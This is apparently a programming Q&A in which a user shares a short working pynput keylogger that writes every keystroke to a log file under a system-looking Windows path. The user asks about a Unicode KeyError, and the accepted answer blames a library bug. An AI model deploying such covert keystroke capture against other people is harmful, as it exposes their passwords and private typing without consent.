# pynput combining exclamation mark

Tags: python, python-2.7, unicode, keyboard

I tried to make a little keylogger with pynput.

That's my code:

```
from pynput.keyboard import Key, Listener
import os
import logging

log_dir = "C:\WindowsLogs\dist"
filename = "logging"
logging.basicConfig(filename=(log_dir + filename), level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()
```

Everything works fine and it also does save every key. But when the exclamation mark is pressed it gets that error:

```
Traceback (most recent call last):
File "test2.py", line 16, in <module>
listener.join()

File "C:\Python27\lib\site-packages\pynput\_util\__init__.py", line 185, in join
six.reraise(exc_type, exc_value, exc_traceback)

File "C:\Python27\lib\site-packages\pynput\_util\__init__.py", line 140, in inner
return f(self, *args, **kwargs)

File "C:\Python27\lib\site-packages\pynput\keyboard\_win32.py", line 232, in _process
key = self._event_to_key(msg, vk)

File "C:\Python27\lib\site-packages\pynput\keyboard\_win32.py", line 265, in _event_to_key
msg in self._PRESS_MESSAGES))

File "C:\Python27\lib\site-packages\pynput\keyboard\_base.py", line 49, in __init__
'COMBINING ' + unicodedata.name(self.char))

KeyError: "undefined character name 'COMBINING EXCLAMATION MARK'"
```

What is wrong with the code? And what does that mean?

Comment: That's part of your code, but doesn't run.  Make a [mcve] and include the full traceback so we know what line caused the error.

Comment: show us how you are printing the keypresses. I think ! is a special as per pynput

Comment: Thanks for the suggestions. This is the code I am running. I also added the whole error message. I hope you can work with it better now.

Answer (score 0, accepted):

I got it! It's a bug in pynput. Installed an older version and now it works perfectly!